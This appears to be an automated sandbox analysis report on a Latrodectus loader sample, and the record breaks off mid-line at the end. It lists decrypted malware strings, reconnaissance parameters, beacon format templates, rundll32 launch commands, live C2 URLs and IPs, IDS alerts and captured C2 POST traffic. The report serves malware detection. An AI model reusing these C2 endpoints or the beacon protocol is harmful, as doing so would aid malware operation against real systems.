Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_view_all_domain=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_view_all=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_group=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &wmic=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_config_ws=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &net_wmic_av=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &whoami_group=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "pid":
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%d",
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "proc":
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%s",
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "subproc": [
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &proclist=[
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "pid":
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%d",
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "proc":
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%s",
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "subproc": [
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &desklinks=[
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: .
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "%s"
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Update_%x
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Custom_update
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: .dll
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: .exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Error
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: runnung
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %s/%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: front
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /files/
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Alpha
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Cookie:
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: POST
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: GET
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: curl/7.88.1
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: CLEARURL
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: URLS
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: COMMAND
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: ERROR
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: [{"data":"
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: "}]
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &dpost=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: https://isomicrotich.com/test/
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: https://opewolumeras.com/test/
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: \*.dll
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: AppData
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Desktop
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Startup
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Personal
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Local AppData
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %s%d.dll
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: <!DOCTYPE
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Content-Length: 0
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: <html>
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Content-Type: application/dns-message
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: 12345
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: 12345
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &stiller=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %s%d.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %x%x
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &mac=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %02x
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: :%02x
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &computername=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &domain=%s
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: LogonTrigger
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: \Registry\Machine\
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: TimeTrigger
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: PT0H%02dM
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: PT0S
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: \update_data.dat

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49773 version: TLS 1.2

Source:	Binary string: kernel32.pdbUGP source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.1376710622.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1415603065.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1417110861.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.1427586345.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1403034734.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.1428897792.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000017.00000002.2565190812.000000018005F000.00000002.00000001.01000000.00000003.sdmp, vierm_soft_x64.dll.dll
Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\explorer.exe	Code function: 30_2_089DA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,		30_2_089DA8E0
Source: C:\Windows\explorer.exe	Code function: 30_2_089D2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,		30_2_089D2B28

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49779 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49789 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49774 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49782 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49781 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49773 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49793 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49784 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49787 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49777 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49790 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49788 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49780 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49795 -> 188.114.96.3:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 82.115.223.39 8041	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 443
Source: C:\Windows\System32\rundll32.exe	Network Connect: 80.78.24.30 8041	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://isomicrotich.com/test/
Source: Malware configuration extractor	URLs: https://opewolumeras.com/test/

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49797

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.9:49718 -> 80.78.24.30:8041
Source: global traffic	TCP traffic: 192.168.2.9:49722 -> 82.115.223.39:8041

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 82.115.223.39 82.115.223.39
Source: Joe Sandbox View	IP Address: 80.78.24.30 80.78.24.30

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: MIDNET-ASTK-TelecomRU MIDNET-ASTK-TelecomRU
Source: Joe Sandbox View	ASN Name: CYBERDYNELR CYBERDYNELR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFh9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFl9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFm9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFp9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFo9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0fUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4+SA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4uSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4eSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg4OSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 30_2_089D5078 InternetReadFile,

30_2_089D5078

Source: global traffic	DNS traffic detected: DNS query: tiguanin.com
Source: global traffic	DNS traffic detected: DNS query: greshunka.com
Source: global traffic	DNS traffic detected: DNS query: bazarunet.com
Source: global traffic	DNS traffic detected: DNS query: isomicrotich.com

Source: unknown

Source: explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848954010.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 